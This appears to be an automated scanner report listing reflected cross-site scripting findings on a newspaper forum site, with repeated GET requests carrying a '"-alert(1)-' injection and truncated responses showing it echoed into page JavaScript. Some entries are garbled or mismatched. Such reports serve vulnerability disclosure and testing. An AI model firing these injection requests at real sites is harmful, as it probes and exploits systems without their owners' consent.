GET /topice534b"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:02 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:26 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topice534b"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/ferret-theory-lv |
GET /topic/ferret-theory-lvcf2d6"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:12 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... pt"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/ferret-theory-lvcf2d6"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/ferret-theory-lv |
GET /topic/ferret-theory-lv?7fe24"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:51 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21162 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... t"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/ferret-theory-lv?7fe24"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/oil-and-iran-war |
GET /topic2deab"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic2deab"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/oil-and-iran-war |
GET /topic/oil-and-iran-war96781"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:29 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... pt"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/oil-and-iran-war96781"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/oil-and-iran-war |
GET /topic/oil-and-iran-war?195d3"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:01 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23342 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... t"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/oil-and-iran-war?195d3"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/oil-price-and-iran |
GET /topicbdef6"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22134 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topicbdef6"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageNa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/oil-price-and-iran |
GET /topic/oil-price-and-iran Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22134 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... f (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/oil-price-and-iran s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/oil-price-and-iran |
GET /topic/oil-price-and-iran Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:59 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 98092 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/oil-price-and-iran s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/pentagon-cant |
GET /topicfe5e4"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topicfe5e4"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/pentagon-cant |
GET /topic/pentagon-cant Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ned') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/pentagon-cant s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/pentagon-cant |
GET /topic/pentagon-cant Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:03 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19412 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ed') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/pentagon-cant s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/supreme-court-wont |
GET /topic8d4a7"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22218 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic8d4a7"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=get ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/supreme-court-wont |
GET /topic/supreme-court-wont Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:07 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:31 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22218 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/supreme-court-wont s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/supreme-court-wont |
GET /topic/supreme-court-wont Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:54 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23285 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... "; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/supreme-court-wont s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/war-crisis-in |
GET /topic4a503"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22136 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic4a503"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageN ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/war-crisis-in |
GET /topic/war-crisis-in Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:33 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22136 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/war-crisis-in s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /topic/war-crisis-in |
GET /topic/war-crisis-in Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:18 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 162532 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic/war-crisis-in s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /xml/comments |
GET /xml34def"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22102 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... language="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / xml34def"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaig ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /xml/comments |
GET /xml/commentsdf349"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:40 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22102 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / xml/commentsdf349"-alert(1)- 